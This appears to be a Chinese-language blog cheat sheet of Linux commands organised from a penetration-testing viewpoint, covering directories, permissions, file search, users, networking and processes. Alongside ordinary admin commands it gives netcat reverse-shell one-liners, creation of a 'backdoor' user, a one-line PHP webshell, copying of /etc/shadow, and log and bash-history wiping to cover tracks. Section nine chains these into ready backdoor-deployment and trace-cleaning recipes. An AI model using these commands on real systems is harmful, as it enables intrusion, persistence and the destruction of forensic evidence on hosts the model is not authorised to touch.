一、Linux 核心目录结构(渗透视角)
掌握这些目录能帮助你快速定位敏感文件、日志、配置等关键资源。
| 目录 | 作用 | 渗透价值 |
|---|---|---|
| /root | root 用户家目录 | 私钥、历史命令、配置文件等敏感信息 |
| /home | 普通用户家目录 | 用户数据、浏览器记录、弱密码线索 |
| /etc | 系统配置中心 | passwd、shadow、ssh/httpd 配置等核心信息 |
| /var | 可变数据 | 日志、网站目录、数据库数据 |
| /tmp | 临时目录 | 任意读写,常用于上传后门、临时脚本 |
| /bin /sbin /usr/bin /usr/sbin | 系统命令 | 权限判断、命令路径确认 |
| /proc | 虚拟系统信息 | CPU、内存、进程、端口等实时状态 |
二、文件权限基础(渗透核心突破口)
权限字符与数字对应
- r = 4(读)
- w = 2(写)
- x = 1(执行)
示例:-rwxr-xr-- → 754
常用权限命令
ls -l/ls -la:查看权限与隐藏文件chmod 777 test.sh:给所有人读写执行chmod +x script.sh:添加执行权限chown root:root file:修改所有者- 注意:不要给敏感文件(如 /etc/shadow)设置 777!
三、文件操作高频命令(渗透最常用)
读取文件
cat file:小文件less /var/log/auth.log:大文件、日志tail -f syslog:实时监控日志
查找文件(重点)
find / -name "*.php":查找 PHP 文件find / -perm 777 -type f:查找可篡改文件find / -user root -name id_rsa:查找 root 私钥
搜索内容
grep -r "password" /var/www:递归查找密码cat /etc/passwd | grep bash:筛选可登录用户
文件管理
cp /etc/shadow /tmp/backup:备份敏感文件rm -rf /tmp/test:删除临时文件(慎用)echo "<?php ... ?>" > backdoor.php:写入一句话后门
四、用户与权限管理命令
whoami:查看当前用户id:查看 UID/GIDuseradd -m backdoor:创建后门用户passwd user:修改密码su root:切换用户sudo -l:查看可执行的 sudo 命令(提权突破口)
五、网络排查命令(信息收集关键)
ifconfig/ip a:查看网络配置ping 192.168.1.1:测试连通性netstat -tlnp:查看监听端口ss -tlnp | grep 80:更快的端口查看curl URL:访问网站wget URL:下载工具nc -zv IP 1-1000:端口扫描nc -e /bin/bash IP PORT:反弹 shell
六、文本处理命令(用于日志清理、批量修改)
sed -i "s/old/new/g" file:替换sed -i "/test/d" auth.log:删除日志行sort | uniq:排序去重
七、进程管理命令(定位恶意进程)
ps -ef | grep backdoor:查找进程top:实时监控kill -9 PID:强制结束pstree -p:查看进程树
八、Shell 命令组合技巧(实战必备)
管道(|)
netstat -tlnp | grep 22:查找 SSH 端口cat /etc/passwd | grep bash | cut -d ":" -f1 > /tmp/user.txtfind ... | xargs grep ... | wc -l:统计敏感文件数量
重定向(>、>>、<)
echo "backdoor" > file:覆盖写入cat /etc/shadow >> backup.txt:追加备份passwd user < pass.txt:批量修改密码
后台运行(&)
nc -e /bin/bash IP PORT &jobs / fg / bg:管理后台任务
九、典型渗透场景命令组合
1. 信息收集
echo "目标主机信息" > /tmp/report.txt &&
ifconfig >> report.txt &&
netstat -tlnp >> report.txt &&
ps -ef >> report.txt
2. 查找可提权文件(SUID)
find / -perm -4000 -type f 2>/dev/null
3. 清理痕迹
echo "" > ~/.bash_history &&
sed -i "/root/d" /var/log/auth.log &&
rm -rf /tmp/*
4. 后门部署
useradd -m backdoor &&
passwd backdoor < /tmp/pass.txt &&
nc -e /bin/bash 192.168.1.101 8888 &
十、学习重点总结
- 记住目录作用:/etc、/var/log、/root、/tmp
- 熟练掌握:find、grep、netstat/ss、sudo、ps、nc
- 多练组合命令:管道、重定向、后台运行
- 实战中:信息收集 → 提权 → 维持访问 → 清理痕迹
No responses yet